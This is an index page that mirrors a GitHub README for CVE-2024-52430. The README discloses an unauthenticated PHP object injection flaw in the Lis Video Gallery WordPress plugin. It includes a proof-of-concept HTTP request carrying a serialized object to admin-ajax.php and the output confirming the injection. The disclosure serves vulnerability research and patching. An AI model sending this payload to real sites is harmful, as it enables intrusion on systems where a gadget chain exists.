Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/cve-2024-52430
Lis Video Gallery <= 0.2.1 - Unauthenticated PHP Object Injection
https://github.com/randomrobbiebf/cve-2024-52430
Last synced: 30 days ago
JSON representation
Lis Video Gallery <= 0.2.1 - Unauthenticated PHP Object Injection
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2024-52430
- Owner: RandomRobbieBF
- Created: 2024-11-25T13:55:39.000Z (about 2 months ago)
- Default Branch: main
- Last Pushed: 2024-11-25T13:56:51.000Z (about 2 months ago)
- Last Synced: 2024-11-25T14:48:25.313Z (about 2 months ago)
- Size: 0 Bytes
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2024-52430
Lis Video Gallery <= 0.2.1 - Unauthenticated PHP Object Injection# Description
The Lis Video Gallery plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 0.2.1 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
```
CVE: CVE-2024-52430
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: lis-video-gallery
```POC
---```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 79action=loadmore&query=O%3a20%3a%22PHP_Object_Injection%22%3a0%3a%7b%7d&page=1
``````
PHP object injection has occurred.
```